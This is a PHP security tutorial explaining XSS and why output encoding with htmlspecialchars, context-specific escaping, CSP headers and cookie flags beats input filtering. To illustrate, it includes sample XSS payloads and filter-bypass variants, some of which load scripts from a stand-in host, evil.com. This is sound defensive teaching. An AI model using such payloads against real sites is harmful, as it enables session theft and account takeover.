Cross-Site Scripting in PHP: Why Output Encoding Is the Real Fix
Most articles about cross-site scripting start with advice about filtering user input. Strip script tags. Remove angle brackets. Sanitise at the door. It sounds like good advice, and it creates a false sense of security. Input sanitisation is a reactive game you will eventually lose. Output encoding is the proactive, consistent solution that closes the vulnerability at the point where it actually matters: when data leaves your application and reaches the browser.
If you write PHP that handles user data, understanding this distinction is not optional. It is the difference between code that holds up under attack and code that only looks protected. This guide covers what XSS actually does, why input filtering cannot be relied upon, how output encoding works in PHP, where to apply it across different HTML contexts, what additional defence layers exist, and what to check in your existing code. Every section is written to give you something you can act on immediately.
What Cross-Site Scripting Actually Is
Cross-site scripting, universally abbreviated XSS, is a vulnerability class that allows an attacker to inject executable code into pages served to other users. The injected payload is almost always JavaScript, because JavaScript runs in the victim's browser and has access to everything the browser has access to under your domain.
When a malicious script runs under your domain, the consequences are serious. It can read cookies that do not have the HttpOnly flag set. It can read the full contents of the page including any sensitive data displayed after login. It can make HTTP requests to your server that are indistinguishable from requests made by the victim, including requests that transmit session tokens, form data, or API responses. It can redirect users to attacker-controlled domains. It can rewrite the page content in real time to harvest credentials or display phishing prompts. In worst-case scenarios chained with other vulnerabilities, it can lead to remote code execution on the server.
The attack starts when your application takes user input and returns it in a page response without proper encoding. A search box that displays "You searched for X" is a textbook example. If the search term travels in the URL and the application reflects it back without encoding, anyone who opens a link containing a script tag as the search term executes that script in their own browser. If the term is also stored and shown to others, for example in a "recent searches" list, every visitor who loads that page is affected. The attacker does not need to target specific users. Automated scanners can find reflected parameters like this soon after crawling a new application, and exploit kits weaponise them without manual intervention.
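As a minimal sketch of the search-box case, the two functions below build the same heading with and without encoding. The function names and the sample payload are illustrative assumptions; in a real page the argument would come from something like $_GET['q'].

```php
<?php
// Hypothetical helpers for a "You searched for X" heading.

// Vulnerable: the raw query is concatenated straight into the markup.
function renderSearchHeadingUnsafe(string $query): string
{
    return '<p>You searched for ' . $query . '</p>';
}

// Fixed: the query is HTML-encoded at the point of output.
function renderSearchHeadingSafe(string $query): string
{
    return '<p>You searched for '
        . htmlspecialchars($query, ENT_QUOTES, 'UTF-8')
        . '</p>';
}

$payload = '<script>alert(document.cookie)</script>';

echo renderSearchHeadingUnsafe($payload), "\n"; // a browser would run the script
echo renderSearchHeadingSafe($payload), "\n";   // a browser would show the text literally
```

The only difference between the two is the call to htmlspecialchars() at the moment the value is written into HTML.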
XSS falls into three categories that matter for how you fix them:
- Reflected XSS returns user input in the immediate response without storing it. Search parameters, error messages, and URL parameters are common vectors. The victim must click a specifically crafted link for the attack to work.
- Stored XSS saves malicious input to a database or file and serves it to every user who views the affected page. Blog comments, user profile fields, and forum posts are typical entry points. This is generally more severe because it requires no user interaction beyond visiting the page.
- DOM-based XSS occurs entirely on the client side. The server sends a page where client-side JavaScript reads user input and inserts it into the Document Object Model without proper sanitisation. The server response may be completely clean. The vulnerability lives in the JavaScript, not the server-side PHP code.
Why Input Sanitisation Cannot Be Trusted
Input sanitisation tries to solve the problem at the wrong point. You inspect incoming data, remove or escape what looks dangerous, and store the cleaned version. The theory makes sense. The practice falls apart for reasons that are not hypothetical.
Browsers interpret HTML and JavaScript in ways that are not intuitive and that evolve between versions. A script tag can be written as <script>, <SCRIPT>, <scRipt>, <script/src=//evil.com>, using HTML entity encoding like &lt;script&gt;, using Unicode escapes like \u003cscript\u003e, or with null-byte injection that terminates the string before the filter sees the dangerous part. Filters that block the obvious <script> tag routinely miss these variants. There are encoding mismatches between how PHP reads a string, how a database stores it, and how the browser parses it. Each step in that chain can interpret the same bytes differently, and a filter calibrated for one interpretation may fail against another.
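To make the filter problem concrete, here is a deliberately naive blocklist filter and two payloads that survive it. The filter function is a hypothetical example written for this illustration, not taken from any library.

```php
<?php
// A deliberately naive blocklist filter (hypothetical, for illustration only).
function naiveStripScriptTags(string $input): string
{
    // Single pass, case-insensitive removal of the literal tags.
    return str_ireplace(['<script>', '</script>'], '', $input);
}

// Payload 1 nests a tag inside a tag: removing the inner one rebuilds the outer one.
$nested = '<scr<script>ipt>alert(1)</scr</script>ipt>';
// Payload 2 never uses a script tag at all.
$handler = '<img src=x onerror=alert(1)>';

echo naiveStripScriptTags($nested), "\n";  // <script>alert(1)</script>
echo naiveStripScriptTags($handler), "\n"; // <img src=x onerror=alert(1)>

// Encoding at output neutralises both without needing to recognise either.
echo htmlspecialchars($nested, ENT_QUOTES, 'UTF-8'), "\n";
echo htmlspecialchars($handler, ENT_QUOTES, 'UTF-8'), "\n";
```

The filter has to anticipate every dangerous shape in advance. The encoder only has to know which characters are special in HTML.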
What is dangerous depends entirely on context. The same string is safe inside a text node, dangerous inside an HTML attribute value, and catastrophic inside a script block. A filter that is correct for one context may be completely wrong for another. Designing one input sanitisation strategy that is safe in every possible output context is an unsolved problem in general form. Getting it wrong in one place, even slightly, is enough to compromise the entire application.
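The context problem can be sketched with a single input that contains no tags at all. The payload below is an assumed example; strip_tags() stands in for a typical input filter.

```php
<?php
// An input with no angle brackets, so tag-based filters have nothing to remove.
$input = '" autofocus onfocus="alert(1)';

// strip_tags() finds no tags, so the "sanitised" value is unchanged.
$filtered = strip_tags($input);

// Text node context: quotes have no special meaning here, nothing executes.
$asText = '<p>' . $filtered . '</p>';

// Attribute context: the leading quote closes the value and adds new attributes.
$asAttribute = '<input value="' . $filtered . '">';

// Encoding for the attribute context at output time keeps the value inside the quotes.
$encoded = '<input value="' . htmlspecialchars($input, ENT_QUOTES, 'UTF-8') . '">';

echo $asText, "\n";
echo $asAttribute, "\n"; // <input value="" autofocus onfocus="alert(1)">
echo $encoded, "\n";     // <input value="&quot; autofocus onfocus=&quot;alert(1)">
```

The filtered value is identical in both places. Only the output context decides whether it is harmless or an injected event handler.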
New bypass techniques are published regularly. The security research community finds encoding tricks, parser differentials, and character injection methods that defeat current filters. An application that was secure last month may have a known bypass published next week. Input filters based on pattern matching cannot adapt quickly enough to keep pace with a community actively looking for ways around them.
Input sanitisation has a legitimate role as a secondary defence for specific use cases such as rich text fields that must accept HTML markup. For general data fields, it cannot be your primary XSS protection. For the broader practical approach, see a PHP security checklist for business websites.
Output Encoding: The Correct Solution
Output encoding converts data into a safe representation at the point where it is inserted into HTML. The browser receives the encoded version and renders it as text, not as markup or code. An attack payload stored in your database gets displayed harmlessly as text on the page instead of executing as JavaScript.
The correct PHP function for HTML context is htmlspecialchars(). It converts the five characters that have special meaning in HTML into their entity equivalents:
- Less-than (<) becomes &lt;
- Greater-than (>) becomes &gt;
- Ampersand (&) becomes &amp;
- Double quotes (") become &quot; unless ENT_NOQUOTES is set
- Single quotes (') become &#039; or &apos; (depending on the document type flag) only when ENT_QUOTES is set
The correct usage in modern PHP looks like this:
echo htmlspecialchars($userInput, ENT_QUOTES, 'UTF-8');
Treat all three arguments as mandatory, even though PHP lets you omit the last two. ENT_QUOTES ensures both single and double quotes are encoded, which is essential for any value that appears inside an HTML attribute. Before PHP 8.1 the default flag was ENT_COMPAT, which leaves single quotes untouched, so calling htmlspecialchars() without ENT_QUOTES on data that ends up inside a single-quoted attribute leaves a direct injection path. The third argument, 'UTF-8', ensures the encoding behaves correctly for the actual character set in use. Declaring the wrong character set, such as ISO-8859-1 when the page is UTF-8, creates a mismatch that attackers may be able to exploit to slip characters past the encoding.
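One way to keep the flags and character set consistent is a small wrapper used at every output point. The name e() is an assumption borrowed from common convention, and the added ENT_SUBSTITUTE flag is a choice made for this sketch rather than something the text above requires.

```php
<?php
// Hypothetical helper: one place that fixes the flags and the charset.
function e(?string $value): string
{
    // ENT_SUBSTITUTE replaces invalid byte sequences with U+FFFD instead of
    // letting htmlspecialchars() return an empty string for the whole value.
    return htmlspecialchars($value ?? '', ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

echo e('<b>O\'Reilly & "Co"</b>'), "\n";
// &lt;b&gt;O&#039;Reilly &amp; &quot;Co&quot;&lt;/b&gt;

echo e(null), "\n"; // empty string, no deprecation notice for null input
```

With a helper like this, a template line becomes <p><?php echo e($commentText); ?></p>, which is short enough that there is little temptation to skip it.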
Where Output Encoding Must Be Applied
Every point where dynamic data reaches HTML output requires encoding, with no exceptions. Missing it in one location creates an active XSS vulnerability. The contexts that matter most are HTML body text, HTML attribute values, JavaScript context, CSS context, and URL contexts. Each has its own encoding rules, and using HTML encoding in JavaScript context does not provide adequate protection.
For HTML body content, the most common context, htmlspecialchars() with ENT_QUOTES and UTF-8 is the correct tool. This is straightforward and reliable when applied consistently.
// Correct for HTML body text
echo htmlspecialchars($userName, ENT_QUOTES, 'UTF-8');
// Safe output in a paragraph
<p><?php echo htmlspecialchars($commentText, ENT_QUOTES, 'UTF-8'); ?></p>
For HTML attribute values, the attribute must be quoted, ideally with double quotes. The value inside the quotes needs htmlspecialchars(). Without quotes, an attacker can terminate the attribute early and inject new attributes or content. Even with quotes, if the attribute value is not encoded, injection is straightforward.
// Incorrect: no quotes, no encoding
<input name="username" value=<?php echo $userInput; ?>>
// Incorrect: quotes but no encoding
<input name="username" value="<?php echo $userInput; ?>">
// Correct: quoted and encoded
<input name="username" value="<?php echo htmlspecialchars($userInput, ENT_QUOTES, 'UTF-8'); ?>">
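For JavaScript context inside <script> tags or event handlers like onclick, HTML encoding is not sufficient. You need JavaScript-specific escaping, which is significantly more complex. The reliable approach is to avoid inline JavaScript entirely and use data attributes to pass PHP values to separate JavaScript files, where they can be read with JSON.parse(). If an inline script is unavoidable, emit the value as a JSON literal with json_encode() and the JSON_HEX_* flags. Do not wrap that output in a quoted JavaScript string and call JSON.parse() on it: the JavaScript parser resolves escapes such as \u0022 and \n before JSON.parse() sees them, so any value containing a double quote, backslash, or newline breaks the parse.
<script>
// PHP data emitted as a JSON literal, which is also a valid JavaScript expression
var userData = <?php echo json_encode($userDataArray, JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP); ?>;
</script>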
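The data-attribute approach mentioned above can be sketched as follows. The helper name, the element id, and the data-user attribute are all assumptions made for illustration; the client-side lines are shown as comments because they would live in a separate .js file.

```php
<?php
// Hypothetical helper: render an element that carries $data in a data attribute.
function renderDataElement(string $id, array $data): string
{
    // Encode to JSON first, then HTML-encode the JSON for the attribute context.
    $json = json_encode($data, JSON_THROW_ON_ERROR);
    return sprintf(
        '<div id="%s" data-user="%s"></div>',
        htmlspecialchars($id, ENT_QUOTES, 'UTF-8'),
        htmlspecialchars($json, ENT_QUOTES, 'UTF-8')
    );
}

$data = [
    'name' => '</script><script>alert(1)</script>',
    'note' => 'O\'Neil "Mac"',
];
$html = renderDataElement('profile', $data);
echo $html, "\n";

// In a separate JavaScript file (assuming the markup above):
//   const el = document.getElementById('profile');
//   const user = JSON.parse(el.dataset.user);
//   el.textContent = user.name; // textContent, not innerHTML
```

The browser decodes the HTML entities when it reads the attribute, so JSON.parse() receives the original JSON text, and no user data ever appears inside a script block.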
If you use a modern template engine, check whether it performs automatic output encoding by default. Twig does when autoescaping is enabled, which is its default. Laravel's Blade does for the {{ }} echo syntax but not for {!! !!}. Raw PHP does not. Raw PHP gives you full control, which means full responsibility for getting every output point correct.
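For URL contexts, use urlencode() or rawurlencode() on individual parameter values before inserting them into a URL string. Never concatenate raw user input into a URL, even if the value looks harmless. When the whole URL comes from the user, for example a profile link, parameter encoding does not help: a value like javascript:alert(1) in an href attribute is a working XSS payload, and htmlspecialchars() leaves it intact because it contains no HTML special characters. Check the scheme against an allowlist such as http and https before output, then HTML-encode the result for the attribute.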
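A minimal sketch of both URL cases follows. The function names, the /search path, and the choice to fall back to "#" are assumptions for illustration. Note that this version rejects relative URLs as well, which may or may not suit your application.

```php
<?php
// Case 1: user input is a single parameter value in a URL you control.
function searchUrl(string $term): string
{
    return '/search?q=' . rawurlencode($term);
}

// Case 2: the whole URL is user-supplied. Allow only http and https,
// then HTML-encode the result for use inside a quoted href attribute.
function safeHref(string $url): string
{
    $url = trim($url);
    $scheme = parse_url($url, PHP_URL_SCHEME);
    if (!is_string($scheme) || !in_array(strtolower($scheme), ['http', 'https'], true)) {
        return '#'; // no scheme, unparsable, or a scheme outside the allowlist
    }
    return htmlspecialchars($url, ENT_QUOTES, 'UTF-8');
}

echo searchUrl('a b&c=d'), "\n";                       // /search?q=a%20b%26c%3Dd
echo safeHref('javascript:alert(1)'), "\n";            // #
echo safeHref('https://example.com/?a=1&b=2'), "\n";   // https://example.com/?a=1&amp;b=2
```

An allowlist is used rather than a check for "javascript:" because browsers accept several other executable or surprising schemes, and a blocklist would repeat the input-filtering problem described earlier.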
Content Security Policy as a Defence Layer
Correct output encoding should stop XSS from executing. Defence in depth means having a secondary layer in case encoding is missed somewhere. Content-Security-Policy headers tell the browser explicitly which sources of content are permitted to execute on your page. A properly configured CSP can prevent XSS from running even if some output encoding is absent or incorrect.
A restrictive CSP blocks inline scripts and limits script sources to your own origin by default. A basic restrictive policy looks like:
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self';
This tells the browser that JavaScript may only load from the same origin, no plugins are permitted, and the base URL for relative links must also come from the same origin. An injected <script src="http://evil.com/payload.js"> will be blocked because evil.com is not in the script-src directive.
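If the header is sent from PHP rather than from the web server configuration, a sketch could look like the following. The buildCsp() helper is hypothetical; only header() and headers_sent() are PHP built-ins.

```php
<?php
// Hypothetical helper: build a header value from directive => sources pairs.
function buildCsp(array $directives): string
{
    $parts = [];
    foreach ($directives as $name => $sources) {
        $parts[] = $name . ' ' . implode(' ', $sources);
    }
    return implode('; ', $parts);
}

$policy = buildCsp([
    'default-src' => ["'self'"],
    'script-src'  => ["'self'"],
    'object-src'  => ["'none'"],
    'base-uri'    => ["'self'"],
]);

// Headers must be sent before any page output.
if (!headers_sent()) {
    header('Content-Security-Policy: ' . $policy);
}
```

Keeping the policy as an array makes it easier to add an allowed source for one directive later without hand-editing a long string.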
Configuring CSP correctly requires auditing every piece of content your pages load. External scripts, analytics platforms, advertising networks, embedded video players, social media widgets, and CDN-hosted libraries all need to be permitted explicitly, or your CSP will break them. Start with a report-only policy to identify violations without blocking anything:
Content-Security-Policy-Report-Only: default-src 'self'; report-uri /csp-report;
Review the reports, adjust the policy to allow legitimate resources, then enable enforcement once the report-only run is clean. Understanding HTTPS and TLS configuration is closely related to security headers like CSP, and both contribute to a secure website configuration.
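Browsers deliver report-uri violations as a JSON POST body with a top-level "csp-report" object. A minimal sketch of a receiver for the /csp-report path might look like this; the function name and log format are assumptions, and a production endpoint would also want rate limiting.

```php
<?php
// Hypothetical summariser for a report-uri style violation report.
function summariseCspReport(string $rawBody): ?string
{
    $data = json_decode($rawBody, true);
    $report = is_array($data) ? ($data['csp-report'] ?? null) : null;
    if (!is_array($report)) {
        return null; // not a report-uri style payload
    }
    // Report fields are attacker-influenced: strip control characters before logging.
    $clean = static function ($value): string {
        return is_scalar($value)
            ? (string) preg_replace('/[\x00-\x1F\x7F]/', '', (string) $value)
            : '?';
    };
    return sprintf(
        'CSP violation: %s blocked by %s on %s',
        $clean($report['blocked-uri'] ?? '?'),
        $clean($report['violated-directive'] ?? '?'),
        $clean($report['document-uri'] ?? '?')
    );
}

// In the endpoint script:
//   $line = summariseCspReport(file_get_contents('php://input'));
//   if ($line !== null) { error_log($line); }
//   http_response_code(204);
```

Grouping the logged lines by blocked URI and directive gives a quick list of the legitimate resources the policy still needs to allow.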
HttpOnly and Secure Flags on Session Cookies
XSS and session theft are closely related. If XSS can read your session cookie, the attacker has full access to the authenticated session without needing the password. The HttpOnly flag instructs the browser to withhold the cookie from JavaScript access, and all modern browsers honour it. It does not stop an injected script from sending requests that carry the cookie automatically, but it removes the most common script-based theft path.
The Secure flag instructs the browser only to transmit the cookie over HTTPS connections. This prevents interception on unencrypted network paths. Without it, an attacker on the same WiFi network or at any point in the network path can read the session cookie in plain text.
// Set before session_start(); session.cookie_samesite requires PHP 7.3 or later
ini_set('session.cookie_httponly', '1');
ini_set('session.cookie_secure', '1');
ini_set('session.cookie_samesite', 'Strict');
SameSite: Strict means the browser never sends the cookie on any cross-site request, which also provides meaningful protection against cross-site request forgery attacks. These flags do not fix XSS, but they significantly limit what an attacker can achieve even when XSS exists. If you are running a WordPress site or another CMS, these protections are worth checking as part of a WordPress security audit or similar review process.
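The same three flags can also be set per request with the array form of session_set_cookie_params(), available since PHP 7.3. This is an alternative sketch, not a replacement for the ini settings; the helper name and the lifetime and path values are assumptions.

```php
<?php
// Hypothetical helper returning options for session_set_cookie_params().
function hardenedSessionCookieParams(): array
{
    return [
        'lifetime' => 0,        // session cookie: discarded when the browser closes
        'path'     => '/',
        'secure'   => true,     // only sent over HTTPS
        'httponly' => true,     // hidden from JavaScript
        'samesite' => 'Strict', // never sent on cross-site requests
    ];
}

// Usage, before any output and before the session starts:
//   session_set_cookie_params(hardenedSessionCookieParams());
//   session_start();
```

Setting the flags in code keeps them under version control alongside the application, which helps when the php.ini on a host is outside your control.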
Real-World Impact of XSS on Business Applications
XSS consistently ranks among the most prevalent and impactful web application vulnerabilities in industry rankings such as the OWASP Top 10. The consequences are not abstract, and for businesses operating in the UK or internationally, the implications extend beyond technical damage to include reputational harm and regulatory concerns.
For an e-commerce application, XSS can steal session cookies to take over accounts, capture payment card details entered into forms, or redirect users to phishing pages that mirror the legitimate checkout flow. For a SaaS application, XSS can expose business data, customer information, and API credentials to an attacker. For a CMS, XSS in an administrator session can lead to full server compromise through further exploitation such as uploading malicious plugins or modifying server configuration.
Attackers rarely need to target specific applications manually. Automated tools crawl the web looking for XSS and feed the findings into mass exploitation. The window between a vulnerability being introduced and it being found can be short, often hours for applications with meaningful traffic, and less for high-profile targets.
Beyond the technical fix, building a security-aware culture matters. Ensuring that everyone involved in building and maintaining web applications understands the risks and knows how to respond appropriately is part of running a secure operation. A practical approach to IT security awareness training can help teams recognise and avoid common mistakes that introduce vulnerabilities.
Auditing Your PHP Code for XSS Vulnerabilities
Knowing what XSS is and how to fix it is only half the work. Finding vulnerabilities in existing code requires a systematic approach. Start by searching every PHP file for echo, print, and printf statements and <?= short echo tags that output variables, function results, or any external data.
For each output point, verify that htmlspecialchars() or equivalent encoding is applied with ENT_QUOTES and the correct character set. Pay particular attention to output inside HTML attributes, inside <script> blocks, and inside inline event handlers like onclick, onerror, and onload.
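A first pass over a codebase can be automated with a rough heuristic. The sketch below flags lines that output a variable without any htmlspecialchars() call on the same line. The function name and the regular expression are assumptions, and the check will produce both false positives and false negatives (multi-line statements, wrapper helpers, and values encoded earlier are all missed), so treat its output as a reading list rather than a verdict.

```php
<?php
// Heuristic sketch: return 1-based line numbers that echo a variable unencoded.
function findSuspectOutputLines(string $source): array
{
    $suspects = [];
    foreach (preg_split('/\R/', $source) as $i => $line) {
        // An output construct followed by a variable before the next semicolon.
        $outputsVariable = preg_match('/(<\?=|\b(echo|print|printf)\b)[^;]*\$/', $line) === 1;
        $isEncoded = stripos($line, 'htmlspecialchars(') !== false;
        if ($outputsVariable && !$isEncoded) {
            $suspects[] = $i + 1;
        }
    }
    return $suspects;
}

$template = <<<'PHP'
<p><?= $title ?></p>
<p><?php echo htmlspecialchars($name, ENT_QUOTES, 'UTF-8'); ?></p>
<?php echo 'static text'; ?>
<?php print $comment; ?>
PHP;

print_r(findSuspectOutputLines($template)); // lines 1 and 4
```

Running something like this over every .php file gives a list to review by hand, which is where the context-specific checks for attributes, script blocks, and event handlers come in.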
Automated scanners like OWASP ZAP and Burp Suite can crawl your application and test each parameter with a range of XSS payloads including known filter bypasses. They do not find everything, but they find the obvious gaps quickly. Combine automated scanning with manual code review for best coverage.
When vulnerabilities are found, document them clearly so they can be tracked and resolved. Good IT documentation practices help teams maintain security knowledge and track remediation progress over time.
Where to Focus Your Security Efforts
If you take one thing from this article, let it be this: output encoding at the point of display is the reliable fix for XSS. Input sanitisation is a secondary measure for specific use cases, not a primary strategy. The practical steps are straightforward: use htmlspecialchars() with ENT_QUOTES and UTF-8 at every HTML output point, apply context-specific encoding for JavaScript and URLs, audit your existing code for missing encoding, add Content Security Policy headers as a secondary defence, and configure session cookies with HttpOnly, Secure, and SameSite flags.
Security is not a one-time fix. Review your code when you add new features, update your dependencies, or change your output contexts. New bypass techniques emerge regularly, and what was secure last year may need re-evaluation this year.
If you need help reviewing your current PHP setup, prepare a short note with your codebase location, the frameworks you use, and the output contexts that are most likely to have been missed. That gives a clear starting point for a practical review.